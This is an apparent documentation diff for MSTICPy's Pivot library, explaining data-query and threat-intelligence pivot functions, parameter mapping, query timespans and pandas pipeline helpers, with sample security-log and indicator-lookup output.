+from the function definitions and parameters.
+
+For advanced use, you can override the default behavior of joining on
+inferred join keys by specifying ``left_on`` and ``right_on`` parameters.
+The ``left_on`` parameter is typically the input parameter name and
+``right_on`` is a column in the output DataFrame (the pivot results).
+Usually, you won't need to use this flexibility.
+
+The join operation also supports a ``join_ignore_case`` parameter.
+This lets you join text columns ignoring case differences. This can
+be helpful with data like hash strings and domain names, which are
+case insensitive and can be represented differently.
+
+.. warning:: using ``join_ignore_case`` does add a performance
+   overhead since normalized case columns need to be created for both
+   input and output data sets before the join takes place.
+   This might be a significant overhead on larger data sets.
+
+Data query pivot functions
+--------------------------
+
+How are queries assigned to specific entities?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Pivot library uses the parameters defined for each query to
+decide whether a query is related to a particular entity type. It
+also uses the query parameters to create mappings between specific
+entity attributes (e.g. IpAddress.Address) and query parameters
+(ip_address or ip_address_list).
+
+It uses a limited set of parameter names to do this mapping so to
+have your query show up as a pivot function, you should follow the same
+standard parameter naming as we use in *MSTICPy* built-in queries.
+
+Query parameter mapping:
+
+=================  ================  ===================
+Query Parameter    Entity            Entity Attribute
+=================  ================  ===================
+account_name       Account           Name
+host_name          Host              fqdn
+process_name       Process           ProcessFilePath
+source_ip_list     IpAddress         Address
+ip_address_list    IpAddress         Address
+ip_address         IpAddress         Address
+user               Account           Name
+logon_session_id   Process           LogonSession
+                   HostLogonSession  SessionId
+                   Account           LogonId
+process_id         Process           ProcessId
+commandline        Process           CommandLine
+url                Url               Url
+file_hash          File              file_hash
+domain             Dns               DomainName
+resource_id        AzureResource     ResourceId
+=================  ================  ===================
+
+If you have existing queries that use different names than those
+listed in this table, you can take advantage of a feature added to the
+*MSTICPy* query definition format - *parameter aliases*.
+
+To use these, change the primary name of your parameter to one of the
+items listed above and then add an aliases item to the parameter entry
+for the query. The example below shows that *file_hash* has an alias
+of *sha1*. This means that you can use either of these to refer to the same
+parameter when invoking the query.
+
+.. code::yaml
+
+        | where SHA1 has "{file_hash}"
+        {add_query_items}'
+    parameters:
+      file_hash:
+        description: SHA1 hash
+        type: str
+        aliases:
+          - sha1
+
+
+Running pivot data queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+A word about parameters
+^^^^^^^^^^^^^^^^^^^^^^^
+
+A significant difference between the pivot functions that we've seen so far
+and data query functions is that the latter **do not** accept **generic**
+parameter names (other than the "data" parameter).
+
+The reason for is that frequently data queries require multiple
+parameters and using generic names like "column" and "value"
+makes it very difficult to decide which value belongs to which
+column.
+
+When you use a named parameter in a data query pivot, you must
+specify the parameter name that the query function is expecting.
+
+.. code:: ipython3
+
+    Host.AzureSentinel.list_host_events_by_id(
+        host_name="mypc",
+    )
+
+    Host.AzureSentinel.list_host_events_by_id(
+        data=input_df,
+        host_name="computer",
+    )
+
+In the first example, the query will be run with "host_name='mypc'.
+In the second example, ``host_name`` is the parameter name expected by the
+query and ``computer`` is the name of the column in the input
+DataFrame that is the source of the host_name values. The query will
+be executed once for each row, supplying each row's value for the
+``computer`` column as the query's ``host_name`` parameter.
+
+
+If in doubt about what the correct parameter name to use is,
+use the "?" suffix to show the function help.
+
+Example:
+
+::
+
+       Host.AzureSentinel.list_host_events_by_id?
+
+
+Ensure that you've authenticated/connected to the data provider.
+
+.. code:: ipython3
+
+    ws = WorkspaceConfig(workspace="YourWorkspace")
+    az_provider.connect(ws.code_connect_str)
+
+
+A second significant difference is that most queries require
+a time range to operate over.
+
+The ``start`` and ``end`` datetime parameters common to most queries
+are automatically added by the pivot library. The values of these are
+taken from the Pivot object, using the time range
+defined in its ``timespan`` property. You can override these auto-populated
+values when you call a function by explicitly
+specifying the ``start`` and ``end`` parameter values in the function
+call.
+
+.. note:: The time range is used dynamically. If you change
+   the Pivot timespan property, the new value will be used by
+   future queries as they are run. This means that
+   if you re-run earlier queries after changing the timespan they
+   will execute with different time parameters.
+
+Setting default timespan for queries interactively
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Use the ``edit_query_time`` function to set/change the time range used
+by queries.
+
+With no parameters it defaults to a period of
+
+-  start == [*UtcNow - 1 day*]
+-  end == [*UtcNow*]
+
+Alternatively, you can specify a timespan for the QueryTime UI, using
+the :py:class:`TimeSpan<msticpy.common.timespan.TimeSpan>` class.
+
+See :py:meth:`edit_query_time<msticpy.datamodel.pivot.Pivot.edit_query_time>`
+
+.. code:: ipython3
+
+    from msticpy.common.timespan import TimeSpan
+    ts = TimeSpan(start="2020-10-01", period="1d")
+    Pivot.current.edit_query_time(timespan=ts)
+
+
+.. figure:: _static/pivot_query_time.png
+   :alt: MSTICPy query time control.
+   :height: 1.5in
+
+Setting the timespan programmatically
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can also just set the
+:py:attr:`timespan<msticpy.datamodel.pivot.Pivot.timespan>`
+directly on the pivot object
+
+.. code:: ipython3
+
+    Pivot.current.timespan = ts
+
+What data queries do we have?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This will vary for each Entity type (many entity types have no
+data queries).
+
+For each entity type, you can execute the container object
+corresponding to the data provider that you want to view. Shortcut
+query functions are also displayed with a "qry\_" prefix.
+
+.. code:: ipython3
+
+    Host.AzureSentinel()
+
+
+.. parsed-literal::
+
+    alerts function
+    azsent_bookmarks function
+    aznet_net_flows_depr function
+    aznet_interface function
+    hb_heartbeat function
+    aznet_net_flows function
+    hb_heartbeat_for_host_depr function
+    lxaud_auditd_all function
+    ...
+    lxsys_user_logon function
+    lxsys_logons function
+    lxsys_logon_failures function
+    wevt_all_events function
+    wevt_events_by_id function
+    wevt_list_other_events function
+    wevt_logon_session function
+
+
+.. code:: ipython3
+
+    host = Host(HostName="VictimPc")
+    Host.AzureSentinel.hb_heartbeat(host)
+
+
+==============  ================================  =============  ======================  ============  ========  ================  ================  =============
+SourceSystem    TimeGenerated                     ComputerIP     Computer                Category      OSType      OSMajorVersion    OSMinorVersion  Version
+==============  ================================  =============  ======================  ============  ========  ================  ================  =============
+OpsManager      2020-12-02 20:24:59.613000+00:00  13.89.108.248  VictimPc.Contoso.Azure  Direct Agent  Windows                 10                 0  10.20.18040.0
+==============  ================================  =============  ======================  ============  ========  ================  ================  =============
+
+.. note:: some columns have been removed for brevity
+
+
+.. code:: ipython3
+
+    Host.AzureSentinel.wevt_logons(host_name="VictimPc").head()
+
+
+===================  =========  ================================  ======================  =================  ===================  ================  ================  ==================  ==============================================  ===============
+Account                EventID  TimeGenerated                     Computer                SubjectUserName    SubjectDomainName    SubjectUserSid    TargetUserName    TargetDomainName    TargetUserSid                                   TargetLogonId
+===================  =========  ================================  ======================  =================  ===================  ================  ================  ==================  ==============================================  ===============
+NT AUTHORITY\SYSTEM       4624  2020-10-01 22:39:36.987000+00:00  VictimPc.Contoso.Azure  VictimPc$          CONTOSO              S-1-5-18          SYSTEM            NT AUTHORITY        S-1-5-18                                        0x3e7
+NT AUTHORITY\SYSTEM       4624  2020-10-01 22:39:37.220000+00:00  VictimPc.Contoso.Azure  VictimPc$          CONTOSO              S-1-5-18          SYSTEM            NT AUTHORITY        S-1-5-18                                        0x3e7
+NT AUTHORITY\SYSTEM       4624  2020-10-01 22:39:42.603000+00:00  VictimPc.Contoso.Azure  VictimPc$          CONTOSO              S-1-5-18          SYSTEM            NT AUTHORITY        S-1-5-18                                        0x3e7
+CONTOSO\RonHD             4624  2020-10-01 22:40:00.957000+00:00  VictimPc.Contoso.Azure  VictimPc$          CONTOSO              S-1-5-18          RonHD             CONTOSO             S-1-5-21-1661583231-2311428937-3957907789-1105  0x117a0f7f
+NT AUTHORITY\SYSTEM       4624  2020-10-01 22:40:14.040000+00:00  VictimPc.Contoso.Azure  VictimPc$          CONTOSO              S-1-5-18          SYSTEM            NT AUTHORITY        S-1-5-18                                        0x3e7
+===================  =========  ================================  ======================  =================  ===================  ================  ================  ==================  ==============================================  ===============
+
+
+Query prefixes
+~~~~~~~~~~~~~~
+
+The queries are usually prefixed by a short string indicating the
+data table (or data source) targeted by the query. This is to help
+disambiguate the query functions and keep the overall function
+name manageably short.
+
+Some commonly used prefixes are:
+
+=========  =====================================================
+Prefix     Data source
+=========  =====================================================
+azsent     Azure Sentinel data queries (e.g. bookmarks)
+aznet      Azure network analytics
+aad        Azure Active Directory
+az         Other Azure
+hb         OMS Heartbeat table
+lxsys      Linux Syslog
+lxaud      Linux auditd
+o365       Office 365 activity
+wevt       Windows security events
+=========  =====================================================
+
+
+Using additional parameters
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+We may need to specify multiple parameters for a query. For example,
+the ``list_host_events_by_id`` function requires a host_name parameter
+but can also take a list of event IDs to filter the list returned.
+
+.. parsed-literal::
+
+    Retrieves list of events on a host.
+
+    Parameters
+    ----------
+    add_query_items: str (optional)
+        Additional query clauses
+    end: datetime
+        Query end time
+    event_list: list (optional)
+        List of event IDs to match
+        (default value is: has)
+    host_name: str
+        Name of host
+
+
+The example below shows using two parameters - an entity and a list.
+The host entity is the initial positional parameter.
+Pivot is using the attribute mapping to assign the ``host_name`` function
+parameter the value of the ``host.fqdn`` entity attribute.
+
+The second parameter is a list of event IDs.
+
+Also notice that we are following the query with a series of pandas expressions.
+Because the return value of these functions is a pandas DataFrame you can
+perform pandas operations on the data before displaying it or saving to a variable.
+
+The pandas code here simply selects a subset of columns, the groups by EventID to
+return a count of each event type.
+
+.. code:: ipython3
+
+    (
+        Host.AzureSentinel.list_host_events_by_id(   # Pivot query returns DataFrame
+            host, event_list=[4624, 4625, 4672]
+        )
+        [["Computer", "EventID", "Activity"]] we could have save the output to a dataframe
+        .groupby(["EventID", "Activity"])     variable but we can also use pandas
+        .count()                              functions/syntax directly on the output
+    )
+
+
+==========================================================  ==========
+                                                              Computer
+==========================================================  ==========
+(4624, '4624 - An account was successfully logged on.')            520
+(4672, '4672 - Special privileges assigned to new logon.')         436
+==========================================================  ==========
+
+
+Using the "print" parameter to help debug queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When calling queries directly from the data provider (e.g.
+``my_provider.get_host_logons(...)``) you can supply a positional string argument
+"print". This causes the query that would be sent to the provider to be
+returned as a string, with parameter values substituted. This is useful for
+debugging queries.
+
+The pivot wrapping mechanism removes positional arguments passed to
+the query pivot function so it is no longer possible to use the simple
+"print" argument. Instead add a keyword argument ``print=True``. This
+causes the provider to skip the query and print out (but not return)
+the full query that would have been executed. Unfortunately it isn't
+possible to return the query string from the pivot function since the
+pivot machinery would try to interpret it as a query result and would
+try to put it into a DataFrame, which would be less than helpful when trying
+to debug something.
+
+
+Using iterables as parameters to data queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Some data queries accept “list” items as parameters (e.g. many of the IP
+queries accept a list of IP addresses). These work as expected, with a
+single query calling sending the whole list as a single parameter.
+
+.. code:: ipython3
+
+    ip_list = [
+        "203.23.68.64",
+        "67.10.68.45",
+        "182.69.173.164",
+        "79.176.167.161",
+        "167.220.197.230",
+    ]
+
+    IpAddress.AzureSentinel.list_aad_signins_for_ip(ip_address_list=ip_list).head(5)
+
+
+================================   ================  ============  ==========  =======  ==========  ================================  ===========================  ===============  ==============================  =========================  ===============  ===================================  ==========
+TimeGenerated                      OperationName       ResultType  Identity      Level  Location    AppDisplayName                    AuthenticationRequirement    ClientAppUsed    ConditionalAccessPolicies       DeviceDetail               IsInteractive    UserPrincipalName                    Type
+================================   ================  ============  ==========  =======  ==========  ================================  ===========================  ===============  ==============================  =========================  ===============  ===================================  ==========
+2020-10-01 13:02:35.957000+00:00   Sign-in activity             0  Brandon           4  US          Azure Advanced Threat Protection  singleFactorAuthentication   Browser          [{'id': '8872f6fb-da88-4b6...   {'deviceId': '', 'oper...  False            brandon@seccxpninja.onmicrosoft.com  SigninLogs
+2020-10-01 14:02:40.100000+00:00   Sign-in activity             0  Brandon           4  US          Azure Advanced Threat Protection  singleFactorAuthentication   Browser          [{'id': '8872f6fb-da88-4b6...   {'deviceId': '', 'oper...  False            brandon@seccxpninja.onmicrosoft.com  SigninLogs
+2020-10-01 15:02:45.205000+00:00   Sign-in activity             0  Brandon           4  US          Azure Advanced Threat Protection  singleFactorAuthentication   Browser          [{'id': '8872f6fb-da88-4b6...   {'deviceId': '', 'oper...  False            brandon@seccxpninja.onmicrosoft.com  SigninLogs
+2020-10-01 17:45:14.507000+00:00   Sign-in activity             0  Brandon           4  US          Microsoft Cloud App Security      singleFactorAuthentication   Browser          [{'id': '8872f6fb-da88-4b6...   {'deviceId': '', 'oper...  False            brandon@seccxpninja.onmicrosoft.com  SigninLogs
+2020-10-01 10:02:18.923000+00:00   Sign-in activity             0  Brandon           4  US          Azure Advanced Threat Protection  singleFactorAuthentication   Browser          [{'id': '8872f6fb-da88-4b6...   {'deviceId': '', 'oper...  False            brandon@seccxpninja.onmicrosoft.com  SigninLogs
+================================   ================  ============  ==========  =======  ==========  ================================  ===========================  ===============  ==============================  =========================  ===============  ===================================  ==========
+
+
+Using iterable values for queries that only accept single values
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In this case the pivot function will iterate through the values of the
+iterable, making a separate query for each and then joining the results.
+
+We can see that this function only accepts a single value for
+“account_name”.
+
+.. code:: ipython3
+
+    Account.AzureSentinel.list_aad_signins_for_account?
+
+
+
+.. parsed-literal::
+
+    Lists Azure AD Signins for Account
+
+    Parameters
+    ----------
+    account_name: str
+        The account name to find
+    add_query_items: str (optional)
+        Additional query clauses
+    end: datetime (optional)
+        Query end time
+    start: datetime (optional)
+        Query start time
+        (default value is: -5)
+    table: str (optional)
+        Table name
+        (default value is: SigninLogs)
+
+
+We can pass a list of account names that we want to return results for, assigning
+the list to the account_name parameter. The pivot library takes care of
+executing the individual queries and joining the results.
+
+.. code:: ipython3
+
+    accounts = [
+        "ananders",
+        "moester",
+    ]
+
+    Account.AzureSentinel.list_aad_signins_for_account(account_name=accounts)
+
+
+================================  ================  ============  ===========  =======  ==========  ================  ===========================  ===============  =====================================================  ================================  ===============  ==============================  ======================
+TimeGenerated                     OperationName       ResultType  Identity       Level  Location    AppDisplayName    AuthenticationRequirement    ClientAppUsed    ConditionalAccessPolicies                              DeviceDetail                      IsInteractive    UserAgent                       UserPrincipalName
+================================  ================  ============  ===========  =======  ==========  ================  ===========================  ===============  =====================================================  ================================  ===============  ==============================  ======================
+2020-10-01 11:04:42.689000+00:00  Sign-in activity             0  Anil Anders        4  IL          Azure Portal      multiFactorAuthentication    Browser          [{'id': '8872f6fb-da88-4b63-bcc7-17247669596b', 'disp  {'deviceId': '', 'operatingSyste  False            Mozilla/5.0 (Windows NT 10...   ananders@microsoft.com
+2020-10-01 11:19:36.626000+00:00  Sign-in activity             0  Mor Ester          4  IL          Azure Portal      multiFactorAuthentication    Browser          [{'id': '8872f6fb-da88-4b63-bcc7-17247669596b', 'disp  {'deviceId': 'e7e06bcd-1c72-4550  False            Mozilla/5.0 (Windows NT 10...   moester@microsoft.com
+2020-10-01 11:19:40.787000+00:00  Sign-in activity             0  Mor Ester          4  IL          Azure Portal      singleFactorAuthentication   Browser          [{'id': '8872f6fb-da88-4b63-bcc7-17247669596b', 'disp  {'deviceId': 'e7e06bcd-1c72-4550  False            Mozilla/5.0 (Windows NT 10...   moester@microsoft.com
+================================  ================  ============  ===========  =======  ==========  ================  ===========================  ===============  =====================================================  ================================  ===============  ==============================  ======================
+
+
+Of course, this type of iterated query execution is not as efficient as
+constructing the query to do exactly what you want and letting the database engine
+take care of the details. However, it does mean that we can use
+generic queries in a more flexible way than was possible before.
+
+.. warning:: Because iterating queries like this is not very efficient,
+   you should avoid using this for
+   large queries where you are passing thousands of query values in a list
+   or dataframe.
+
+
+Combining multiple iterables and single-valued parameters
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The same rules as outline earlier for multiple parameters of different
+types apply to data queries.
+
+Here we are combining sending a list and a string.
+
+.. code:: ipython3
+
+    project = "| project UserPrincipalName, Identity"
+    Account.AzureSentinel.list_aad_signins_for_account(account_name=accounts, add_query_items=project)
+
+
+Using DataFrames as input to query pivots
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This is similar to using dataframes as input parameters, as described
+earlier.
+
+You must use the ``data`` parameter to specify the input dataframe. You
+supply the column name from your input dataframe as the value of the
+parameters expected by the function.
+
+Let's create a toy DataFrame from the earlier list to show the principle.
+
+.. code:: ipython3
+
+    account_df = pd.DataFrame(accounts, columns=["User"])
+    display(account_df)
+
+Now we have our dataframe:
+
+-  we specify ``account_df`` as the value of the ``data`` parameter.
+-  in our source (input) dataframe, the column that we want to use as
+   the input value for each query is ``User``
+-  we specify that column name as the value of the function parameter.
+   In this case the function parameter is ``account_name``.
+
+On each iteration, the column value from the current row will be
+extracted and given as the parameter value for the ``account_name``
+function parameter.
+
+If the function query parameter type is a *list* type - i.e. it
+expects a list of values, the parameter value will be sent as a list
+created from all of the values in that dataframe column. Similarly,
+if you have multiple *list* parameters sourced from different
+columns of your input dataframe, a list will be created for
+column and assigned to the query parameter. In cases where you have
+only a single *list* parameter or all parameters are *lists*, only
+a single query is executed.
+
+However, if you have multiple parameters of mixed types (i.e.
+some lists and some string parameters), the query will be broken into
+separate queries for each row of the input dataframe. Each sub-query
+will get its parameter values from a single row of the input dataframe.
+
+You should not need to worry about these details but if a query
+operation is taking longer than expected, it might be useful to know
+what is happening under the covers.
+
+Joining query output to input
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If the input to your data query pivot function is a DataFrame you can
+also join it to the output. By default, it uses the index of the input
+rows to join to the output. This usually works well unless the input
+index has duplicate values.
+
+Index joining may not work if the query parameter are "list" types
+(e.g. some queries accept parameters that are a sequence of values).
+In these cases, you can override the default joining behavior by
+specifying ``left_on`` and ``right_on`` column names. The ``left_on``
+column name must be a column in the input DataFrame and ``right_on``
+must be a column in the output DataFrame (the query results).
+
+The join operation also supports a ``join_ignore_case`` parameter.
+This lets you join text columns ignoring case differences. This can
+be helpful with data like hash strings and domain names, which are
+case insensitive and can be represented differently.
+
+.. warning:: using ``join_ignore_case`` does add a performance
+   overhead since normalized case columns need to be created from
+   the data before the join takes place. This might be noticable
+   on larger data sets.
+
+Threat Intelligence lookups
+---------------------------
+
+These work in the same way as the functions described earlier. However,
+there are a few peculiarities of the Threat Intel functions:
+
+**Provider-specific pivot functions**
+
+Queries for individual providers are broken out into separate functions
+You will see multiple ``lookup_ipv4`` functions, for example: one with
+no suffix and one for each individual TI provider with a corresponding
+suffix. This is a convenience to let you use a specific provider more
+quickly. You can still use the generic function (``lookup_ipv4``) and
+supply a providers parameter to indicate which providers you want to
+use. See :py:meth:`lookup_iocs<msticpy.sectools.tilookup.TILookup.lookup_iocs>`
+for more details.
+
+**IPv4 and IPv6**
+
+Some providers treat these interchangably and use the same endpoint for
+both. Other providers do not explicitly support IPV6 (for example, the Tor exit
+nodes provider). Still others (notably OTX) use different endpoints for
+IPv4 and IPv6.
+
+If you are querying IPv4 you can use either the ``lookup_ip`` function
+or one of the ``lookup_ipv4`` functions. In most cases, you can also use
+these functions for a mixture of IPv4 and IPv6 addresses. However, in
+cases where a provider does not support IPv6 or uses a different
+endpoint for IPv6 queries you will get no responses for these items.
+
+Entity mapping to IoC Types
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This table shows the mapping between and entity type and IoC Types:
+
+========= =======================================
+Entity    IoCType
+========= =======================================
+IpAddress ipv4, ipv6
+Dns       domain
+File      filehash (including md5, sha1, sha256)
+Url       url
+========= =======================================
+
+You will find all of the TI Lookup functions relating to IpAddresses
+as pivot functions attached to the IpAddress entity.
+
+.. note:: Where you are using a File entity as a parameter, there is a
+   complication. A file entity can have multiple hash values (md5, sha1,
+   sha256 and even sha256 authenticode). The ``file_hash`` attibute of
+   File is used as the default parameter. In cases where a file has
+   multiple hashes the highest priority hash (in order sha256, sha1,
+   md5, sha256ac) is returned. If you are not using file entities as
+   parameters (and specifying the input values explicitly or via a
+   Dataframe or iterable), you can ignore this.
+
+To show the TI lookup functions available for an entity, run the *ti*
+contain function.
+
+.. code:: ipython3
+
+    IpAddress.ti()
+
+
+.. parsed-literal::
+
+    lookup_ip function
+    lookup_ipv4 function
+    lookup_ipv4_OTX function
+    lookup_ipv4_Tor function
+    lookup_ipv4_VirusTotal function
+    lookup_ipv4_XForce function
+    lookup_ipv6 function
+    lookup_ipv6_OTX function
+
+
+This is showing an example of a simple query of a domain using
+a Dns entity
+
+.. code:: ipython3
+
+    from msticpy.datamodel.entities import Url, Dns, File
+    dns = Dns(DomainName="fkksjobnn43.org")
+
+    Dns.ti.lookup_dns(dns)
+
+
+
+===============  =========  ===============  ==============  ==========  ========  ===========  ===========================================================================  ========
+Ioc              IocType    SafeIoc          QuerySubtype    Provider    Result    Severity     Reference                                                                      Status
+===============  =========  ===============  ==============  ==========  ========  ===========  ===========================================================================  ========
+fkksjobnn43.org  dns        fkksjobnn43.org                  OTX         True      high         https://otx.alienvault.com/api/v1/indicators/domain/fkksjobnn43.org/general         0
+fkksjobnn43.org  dns                                         OPR         True      warning      https://openpagerank.com/api/v1.0/getPageRank?domains[0]=fkksjobnn43.org            0
+fkksjobnn43.org  dns        fkksjobnn43.org                  VirusTotal  True      information  https://www.virustotal.com/vtapi/v2/domain/report                                   0
+fkksjobnn43.org  dns        fkksjobnn43.org                  XForce      True      information  https://api.xforce.ibmcloud.com/url/fkksjobnn43.org                                 0
+===============  =========  ===============  ==============  ==========  ========  ===========  ===========================================================================  ========
+
+Using a simple string value returns the same result (as expected).
+
+.. code:: ipython3
+
+    Dns.ti.lookup_dns(value="fkksjobnn43.org")
+
+Like other pivot functions, you can provide input from a list.
+
+.. code:: ipython3
+
+    hashes = [
+        "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd",
+        "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf",
+        "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff",
+    ]
+
+    File.ti.lookup_file_hash_VirusTotal(hashes)
+
+================================================================  ===========  ================================================================  ==============  ==========  ========  ==========  ===============================================  ========
+Ioc                                                               IocType      SafeIoc                                                           QuerySubtype    Provider    Result    Severity    Reference                                          Status
+================================================================  ===========  ================================================================  ==============  ==========  ========  ==========  ===============================================  ========
+02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd  sha256_hash  02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd                  VirusTotal  True      high        https://www.virustotal.com/vtapi/v2/file/report         0
+06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf  sha256_hash  06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf                  VirusTotal  True      high        https://www.virustotal.com/vtapi/v2/file/report         0
+06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff  sha256_hash  06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff                  VirusTotal  True      high        https://www.virustotal.com/vtapi/v2/file/report         0
+================================================================  ===========  ================================================================  ==============  ==========  ========  ==========  ===============================================  ========
+
+You can use a DataFrame as your input. To specify the source column
+you can use either “column” or “obs_column”.
+
+
+.. code:: ipython3
+
+    # Create a dataframe from our hash list and add some extra columns
+    hashes_df = pd.DataFrame(
+        [(fh, f"item_{idx}", "stuff") for idx, fh in enumerate(hashes)],
+        columns=["hash", "ref", "desc"],
+    )
+    display(hashes_df)
+    File.ti.lookup_file_hash_VirusTotal(data=hashes_df, column="hash")
+
+
+A pandas processing pipeline with pivot functions
+-------------------------------------------------
+
+In an earlier section `What is "Pivoting"?`_, we gave an example of
+a typical pivoting pipeline that you might see in a cybersec investigation.
+
+Because pivot functions can take pandas DataFrames as inputs and return them
+as outputs, you can could imagine implementing this chain of operations as
+a series of calls to various pivot functions, taking the output from one
+and feeding it to the next, and so on. However, pandas already supports
+stacking these kinds of operations in what is known as a
+`fluent interface <https://en.wikipedia.org/wiki/Fluent_interface>`_.
+
+Here is an example that chains three operations but without using
+any intermediate variables to store the results of each step. Each operation
+is a method of a dataframe that takes some parameters and its output is
+another dataframe - the results of whatever transformation that particular
+operation performed on the data.
+
+.. code:: ipython3
+
+    (
+        my_df
+        .query("UserCount > 1")
+        .drop_duplicates()
+        .plot()
+    )
+
+The advantages of the fluent style are conciseness and not having to
+deal with intermediate results variables. After building and debugging
+the pipeline, you're never going to be interested in these intermediate
+variables, so why have them?
+
+To make building these types of pipelines easier with pivot functions
+we've implemented some pandas helper functions.
+
+These are available in the
+:py:class:`mp_pivot<msticpy.datamodel.pivot_pd_accessor.PivotAccessor>`
+property of pandas DataFrames, once Pivot is imported.
+
+mp_pivot.run
+~~~~~~~~~~~~
+
+:py:meth:`mp.pivot.run<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.run>`
+lets you run a pivot function as a pandas pipeline operation.
+
+Let's take an example of a simple pivot function using a dataframe as input
+
+.. code:: ipython3
+
+    IpAddress.util.whois(data=my_df, column="Ioc")
+
+This takes a dataframe as the first parameter and returns a dataframe result.
+However, we want to use this function using a fluent style in the middle of
+a larger pandas expression.
+Let's say we have an existing pandas expression like this:
+
+.. code:: ipython3
+
+    (
+        my_df
+        .query("UserCount > 1")
+        .drop_duplicates()
+    )
+
+We want to add a call to the pivot `whois` function into the middle of this
+without having to create intermediate dataframes a clutter our code.
+
+We can us mp_pivot.run to do this:
+
+.. code:: ipython3
+
+    (
+        my_df
+        .query("UserCount > 1")
+        .mp_pivot.run(IpAddress.util.whois, column="Ioc")
+        .drop_duplicates()
+    )
+
+The pandas extension takes care of the `data=my_df` parameter. We still have
+to add any other required parameters (like the column specification in this case.
+When it runs it returns its output as a DataFrame and the next operation
+(drop_duplicates()) runs on this output.
+
+Depending on the scenario you might want to preserve the existing dataframe
+contents (most of the pivot functions only return the results of their specific
+operation - e.g. whois returns ASN information for an IP address). You
+can carry the columns of the input dataframe over to the output from
+the pivot function by adding a `join` parameter to the mp_pivot.run() call.
+Use a "left" to keep all of the input rows regardless of whether the pivot
+function returned a result for that row.
+Use an "inner" join to return only rows where the input had a positive result
+in the pivot function.
+
+.. code:: ipython3
+
+    .mp_pivot.run(IpAddress.util.whois, column="Ioc", join="inner")
+
+
+``mp_pivot.run()`` also supports a couple of parameters to help with
+debugging or simply to have something interesting to watch while
+your pipeline executes. ``verbose`` will print out the number of rows
+returned from the ``run`` function. This is useful to spot which
+item was responsible for your long and ultimate empty pipeline.
+``debug`` add a few more details like a list of columns returned in
+the data and the execution time of the run function.
+
+
+
+There are also a few convenience functions.
+
+.. note:: These second two functions only work in an IPython/Jupyter environment.
+
+mp_pivot.display
+~~~~~~~~~~~~~~~~
+
+:py:meth:`mp_pivot.display<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.display>`
+will display the intermediate results of the dataframe in the middle
+of a pipeline. It does not change the data at all, but does give you the
+chance to display a view of the data partway through processing.
+
+This
+is useful for debugging but its main purpose is to give you a way to
+show partial results without having to break the pipeline into pieces
+and create a bunch of throw-away variables that will add bulk and clutter
+to your memory (the memory on the computer that is - no guarantees that
+it will clear any clutter in your brain!)
+
+display supports some options that you can use to modify the displayed
+output:
+
+-  ``title`` - displays a title above the data
+-  ``columns`` - a list of columns to display (others are hidden)
+-  ``query`` - you can filter the output using a df.query() string.
+   See
+   `DataFrame.query
+   <https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.query.html?highlight=query#pandas.DataFrame.query>`_
+   for more details
+-  ``head`` - limits the display to the first ``head`` rows
+
+These options do not affect the data being passed through the pipeline -
+only how the intermediate output is displayed.
+
+mp_pivot.tee
+~~~~~~~~~~~~
+
+:py:meth:`mp_pivot.tee<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.tee>`
+behaves a little like the Linux "tee" command that splits an input stream
+into two.
+
+mp_pivot.tee allows the input
+data to pass through unchanged but allows you to create a variable that
+is a snapshot of the data at that point in the pipeline. It takes
+a parameter ``var_name`` and assigns the current DataFrame instance
+to that name. So, when your pipeline has run you can access partial results (again,
+without having to break up your pipeline to do so).
+
+By default, it will not overwrite an existing variable of the same name
+unless you specify ``clobber=True`` in the call to ``tee``.
+
+mp_pivot.tee_exec
+~~~~~~~~~~~~~~~~~
+
+:py:meth:`mp_pivot.tee_exec<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.tee_exec>`
+behaves similarly to the "tee" function above except that it
+will try to execute the named DataFrame accessor function on the input
+DataFrame.
+The name of the function (as a string) can be passed named as the value of the
+`df_func` named parameter, or the first positional parameter.
+
+The function **must** be a method of a pandas DataFrame - this includes
+built-in functions such as ``.query``, ``.sort_values`` or a custom function
+added as a custom pd accessor function (see
+`Extending pandas <https://pandas.pydata.org/pandas-docs/stable/development/extending.html?highlight=accessor>`_
+
+mp_pivot.tee_exec allows the input
+data to pass through unchanged but will also send
+a snapshot of the data at that point in the pipeline to the named function.
+You can also pass arbitrary other named arguments to the `tee_exec`. These
+will be passed to the ``df_func`` function.
+
+
+The next three methods are simple helper functions that duplicate a subset
+of the pandas functionality. The syntax is probably more user-friendly
+than the pandas equivalents but not as powerful and, in some cases, potentially
+much less performant.
+
+mp_pivot.filter
+~~~~~~~~~~~~~~~
+
+:py:meth:`mp_pivot.filter<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.filter>`
